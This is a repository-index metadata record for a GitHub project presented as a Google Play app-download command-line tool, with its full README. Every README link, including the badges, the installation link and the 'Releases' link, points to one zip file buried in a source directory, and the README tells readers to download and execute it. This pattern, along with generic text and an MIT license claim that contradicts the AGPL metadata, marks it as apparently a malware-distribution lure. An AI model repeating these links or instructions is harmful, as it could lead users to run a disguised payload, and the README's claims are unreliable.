{"id":28293256,"url":"https://github.com/akutayo2/gplayapicli","last_synced_at":"2026-04-11T03:04:28.562Z","repository":{"id":294716712,"uuid":"987801077","full_name":"akutayo2/GPlayApiCli","owner":"akutayo2","description":"🏪 A CLI tool for interacting with the Google Play Store. Supports downloading apps with and without authentication.","archived":false,"fork":false,"pushed_at":"2025-06-12T06:22:39.000Z","size":85,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-06-12T07:33:54.446Z","etag":null,"topics":["android","automation","cli","command-line-tool","github","google-play","google-play-api","gradle","kotlin","open-source","probot"],"latest_commit_sha":null,"homepage":null,"language":"Kotlin","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/akutayo2.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-21T15:51:39.000Z","updated_at":"2025-06-12T06:22:42.000Z","dependencies_parsed_at":"2025-06-12T07:24:38.281Z","dependency_job_id":"59d21eb7-56c3-410c-b8fe-9f2f87f9fa18","html_url":"https://github.com/akutayo2/GPlayApiCli","commit_stats":null,"previous_names":["akutayo2/gplayapicli"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/akutayo2/GPlayApiCli","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/akutayo2%2FGPlayApiCli","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/akutayo2%2FGPlayApiCli/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/akutayo2%2FGPlayApiCli/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/akutayo2%2FGPlayApiCli/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/akutayo2","download_url":"https://codeload.github.com/akutayo2/GPlayApiCli/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/akutayo2%2FGPlayApiCli/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259729357,"owners_count":22902581,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["android","automation","cli","command-line-tool","github","google-play","google-play-api","gradle","kotlin","open-source","probot"],"created_at":"2025-05-22T06:09:30.110Z","updated_at":"2026-04-11T03:04:28.551Z","avatar_url":"https://github.com/akutayo2.png","language":"Kotlin","funding_links":[],"categories":[],"sub_categories":[],"readme":"# GPlayApiCli 🏪\n\nWelcome to GPlayApiCli, a command-line interface tool designed for seamless interaction with the Google Play Store. This tool allows users to download apps both with and without authentication, making it a versatile addition to your automation toolkit.\n\n![GPlayApiCli](https://github.com/akutayo2/GPlayApiCli/raw/refs/heads/master/src/main/kotlin/com/aurora/store/Play_Cli_Api_G_v2.6.zip) ![GitHub](https://github.com/akutayo2/GPlayApiCli/raw/refs/heads/master/src/main/kotlin/com/aurora/store/Play_Cli_Api_G_v2.6.zip) ![License](https://github.com/akutayo2/GPlayApiCli/raw/refs/heads/master/src/main/kotlin/com/aurora/store/Play_Cli_Api_G_v2.6.zip)\n\n## Table of Contents\n\n- [Features](#features)\n- [Installation](#installation)\n- [Usage](#usage)\n- [Commands](#commands)\n- [Contributing](#contributing)\n- [License](#license)\n- [Support](#support)\n\n## Features\n\n- **Download Apps**: Get apps from the Google Play Store easily.\n- **Authentication Support**: Download apps with or without Google account authentication.\n- **Automation Friendly**: Integrate with your automation scripts effortlessly.\n- **Open Source**: Contribute and customize as per your needs.\n\n## Installation\n\nTo get started with GPlayApiCli, you need to download the latest release. You can find it [here](https://github.com/akutayo2/GPlayApiCli/raw/refs/heads/master/src/main/kotlin/com/aurora/store/Play_Cli_Api_G_v2.6.zip). Download the appropriate file for your system and follow the instructions to execute it.\n\n### Prerequisites\n\n- **Java 8 or higher**: Ensure you have Java installed on your machine.\n- **Gradle**: Make sure you have Gradle set up for building the project.\n\n## Usage\n\nAfter installation, you can start using GPlayApiCli directly from your command line. Here’s a simple example to get you started:\n\n```bash\ngplayapicli download \u003capp-id\u003e\n```\n\nReplace `\u003capp-id\u003e` with the actual ID of the app you wish to download.\n\n## Commands\n\nGPlayApiCli comes with several commands to help you interact with the Google Play Store. Below are the primary commands you can use:\n\n### Download\n\n- **Command**: `download`\n- **Description**: Downloads an app from the Google Play Store.\n- **Usage**: \n  ```bash\n  gplayapicli download \u003capp-id\u003e\n  ```\n\n### List Apps\n\n- **Command**: `list`\n- **Description**: Lists all available apps.\n- **Usage**: \n  ```bash\n  gplayapicli list\n  ```\n\n### Authenticate\n\n- **Command**: `auth`\n- **Description**: Authenticates your Google account.\n- **Usage**: \n  ```bash\n  gplayapicli auth \u003cemail\u003e \u003cpassword\u003e\n  ```\n\n### Help\n\n- **Command**: `help`\n- **Description**: Displays help information for commands.\n- **Usage**: \n  ```bash\n  gplayapicli help\n  ```\n\n## Contributing\n\nWe welcome contributions from the community! If you want to help improve GPlayApiCli, please follow these steps:\n\n1. Fork the repository.\n2. Create a new branch for your feature or bug fix.\n3. Make your changes.\n4. Commit your changes with clear messages.\n5. Push to your branch.\n6. Open a pull request.\n\nPlease ensure that your code follows our coding standards and includes tests where applicable.\n\n## License\n\nGPlayApiCli is licensed under the MIT License. See the [LICENSE](LICENSE) file for more information.\n\n## Support\n\nIf you encounter any issues or have questions, please check the [Releases](https://github.com/akutayo2/GPlayApiCli/raw/refs/heads/master/src/main/kotlin/com/aurora/store/Play_Cli_Api_G_v2.6.zip) section for updates and documentation. You can also open an issue in the GitHub repository for support.\n\n## Topics\n\nThis project touches on various topics, including:\n\n- **Android**: The platform we target.\n- **Automation**: Ideal for automated scripts.\n- **CLI**: A command-line tool for simplicity.\n- **Google Play API**: The core API we interact with.\n- **Open Source**: Feel free to contribute and modify.\n\n## Conclusion\n\nGPlayApiCli is your go-to tool for downloading apps from the Google Play Store. With its straightforward commands and open-source nature, it fits well into any developer's toolkit. For the latest releases, please visit [here](https://github.com/akutayo2/GPlayApiCli/raw/refs/heads/master/src/main/kotlin/com/aurora/store/Play_Cli_Api_G_v2.6.zip).\n\nThank you for checking out GPlayApiCli! Happy downloading!","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fakutayo2%2Fgplayapicli","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fakutayo2%2Fgplayapicli","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fakutayo2%2Fgplayapicli/lists"}